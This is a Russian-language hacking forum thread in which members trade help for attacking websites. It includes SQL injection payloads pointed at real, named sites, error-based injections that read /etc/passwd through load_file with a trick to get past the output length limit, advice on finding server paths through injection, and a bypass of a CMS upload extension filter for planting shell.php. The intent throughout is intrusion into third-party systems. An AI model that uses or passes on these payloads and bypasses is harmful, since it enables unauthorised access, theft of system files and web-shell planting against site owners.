Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Если там база данных MySQL то TCP порт 3306 (дефолт). Если нет, то включи любой сканнер портов и посмотри где и что. Можешь использовать онлайн версию nmap.
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,399
    Likes Received:
    883
    Reputations:
    859
    Потому что там нет information_schema по этому и ошибка
     
    _________________________
  3. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    А куда-же она делась, не подскажите?
    Наверное её админы удалили, да?
     
  4. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    Можно ли залить шелл незнаю полного пути?
     
  5. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    674
    Likes Received:
    332
    Reputations:
    120
    нельзя
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,531
    Likes Received:
    1,250
    Reputations:
    274
    нет....
     
  7. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    можно ли узнать путь через иньку?
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,531
    Likes Received:
    1,250
    Reputations:
    274
    ну если в ошибке путь..но он не всегда соответсвует реальности..и еще если у тебя права файл_прив, то прочитай файлы конфигурации на сервере.. найдешь там и путь..
     
  9. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    390
    Likes Received:
    39
    Reputations:
    23
    Нашел на одном сайте блинд такого вида

    http://www.site.com?id=8'+and+ascii(substring((database()),7,1))=118+and+'x'='x

    пятая ветка мускула

    не могу подобрать прогу для ее раскрутки

    если можно дайте ссылку , на скрипт и прогу которой можно ее раскрутить
     
  10. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    http://www.biostar-russia.ru/app/ru/vga/series.php?S_ID=-55+/*!union*/+/*!select*/+1+--+
    не получается подобрать кол-во колонок..
    кроме еррор-базе никак?
     
  11. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    ммм

    можно ссылку именно на то что ты сказал
     
    #19451 Revi, 24 Feb 2012
    Last edited by a moderator: 24 Feb 2012
  12. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    327
    Likes Received:
    46
    Reputations:
    11
    короче просто ищи файл phpinfo
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,531
    Likes Received:
    1,250
    Reputations:
    274
    phpinfo.php не всегда есть а вот httpd.conf всегда
     
  14. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    вв

    вопрос как его просто искать в папках или через иньку открыть?
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,531
    Likes Received:
    1,250
    Reputations:
    274
    через иньекцию читай...
     
  16. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    пытаюсь выполнить код
    2'AND(extractvalue(1,concat(0x3a,(select(load_file(0x2F6574632F706173737764))))))!='21312
    почему то читает только первую строчку их файла. Как читать последующие строчки?
     
  17. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Error-based выводит 64 байт. Юзай mid().
    2'AND(extractvalue(1,concat(0x3a,(select(mid(load_file(0x2F6574632F706173737764),1,64))))))!='21312
    Начинает с первого читает до 64-символа.
     
  18. alexvrn

    alexvrn New Member

    Joined:
    13 Jun 2010
    Messages:
    2
    Likes Received:
    2
    Reputations:
    5
    Code:
    			// проверяем тип файла
    			$types 		= $cfg['filestype'] ? $cfg['filestype'] : 'jpeg,gif,png,jpg,bmp,zip,rar,tar';
    			$types 		= str_replace('php', '', $types);
    			$types 		= str_replace('htm', '', $types);
    			$types 		= str_replace('htaccess', '', $types);
    			$maytypes 	= explode(',', str_replace(' ', '', $types));  
    			$path_parts = pathinfo($name);
    			// расширение файла
    			$ext        = strtolower($path_parts['extension']);
    			// флаг существования расширения в разрешенных
    			$may        = in_array($ext, $maytypes);
    			if(!$may) { cmsCore::addSessionMessage($_LANG['ERROR_TYPE_FILE'].': '.$types, 'error'); $inCore->redirectBack(); }
    
    Как можно обойти проверку расширений? :confused:
     
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    2alexvrn,
    врядли обойдешь.
     
    1 person likes this.
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    Прозреваю, что переменная $cfg['filestype'] может задаваться где-то в конфигах, поэтому если есть возможность ее установить, то пропиши подобное

    $cfg['filestype'] = 'jpeg,gif,png,jpg,bmp,zip,rar,pphphp';


    и залей shell.php
     
    1 person likes this.
Thread Status:
Not open for further replies.